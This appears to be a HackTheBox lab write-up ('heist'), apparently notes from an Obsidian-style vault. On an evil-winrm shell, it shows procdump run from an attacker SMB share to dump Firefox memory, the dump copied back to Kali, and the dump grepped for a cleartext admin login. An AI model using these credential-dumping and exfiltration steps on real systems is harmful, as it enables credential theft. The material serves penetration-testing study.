Firefox

During the Initial Foothold, Firefox was on the target system. The system firewall also has set Firefox allowed for inbound traffic

*evil-winrm* ps c:\Users\Chase\Documents> ps firefox
 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    349      20    10268      35720       0.11    752   1 firefox
    410      34    26616      84752       1.48   5424   1 firefox
   1076      64   113608     201968       4.42   5724   1 firefox
    391      29    22372      59040       1.05   6224   1 firefox
    360      25    16528      39196       0.14   6928   1 firefox

There are 5 running instances

PEAS also found Firefox installation as well as the credential file. Unfortunately, that led nowhere as necessary files(logins.json or signons.sqlite) were not found

I can try memory dumping

Procdump.exe

While there are many tools available for memory dumping, I will go with the standard Microsoft sponsored tool; procdump.exe

*Evil-WinRM* PS C:\Users\Chase\Documents> \\10.10.14.3\smb\procdump.exe -accepteula firefox

ProcDump v10.11 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[16:55:44] Multiple processes match the specified name.

I can’t just execute it as there are 5 instances of firefox

*Evil-WinRM* PS C:\Users\Chase\Documents> \\10.10.14.3\smb\procdump.exe -accepteula -ma 752 firefox752.dmp
 
ProcDump v10.11 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
 
[17:23:47] Dump 1 initiated: C:\Users\Chase\Documents\firefox752.dmp
[17:23:47] Dump 1 writing: Estimated dump file size is 288 MB.
[17:23:47] Dump 1 complete: 288 MB written in 0.3 seconds
[17:23:47] Dump count reached.

I got the first one done. It has PID of 752.

*Evil-WinRM* PS C:\Users\Chase\Documents> copy firefox752.dmp \\10.10.14.3\smb\firefox752.dmp

I transferred the first memory dump to Kali over SMB

┌──(kali㉿kali)-[~/…/htb/labs/heist/memorydump]
└─$ file firefox752.dmp 
firefox752.dmp: Mini DuMP crash report, 19 streams, Wed Jan 11 11:53:47 2023, 0x461826 type
 
┌──(kali㉿kali)-[~/…/htb/labs/heist/memorydump]
└─$ ll firefox752.dmp 
281M -rwxr-xr-x 1 kali kali 281M Jan 11 12:53 firefox752.dmp

It’s extremely large.

┌──(kali㉿kali)-[~/…/htb/labs/heist/memorydump]
└─$ strings firefox752.dmp | grep -i password* | grep -i login.php
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

DAMN. It took me a while but I figured it out.

The most important thing when going though massive files is choosing the right keywords I was initially checking for “password” or “username”, which returned a few THOUSAND lines of strings containing it.

Then I realized that this is memory dump of a Firefox instance, which narrowed the keywords down by a significant amount.

This section of memory dump is a POST request to the login.php file with data containing CLEARTEXT credential for the admin user; 4dD!5}x/re8]FBuZ ^094809 I could get this validated with the hash extracted earlier

InfoSec LAB

Explorer

Heist_Firefox

Firefox

Procdump.exe

Interactive Graph View

Table of Contents

Backlinks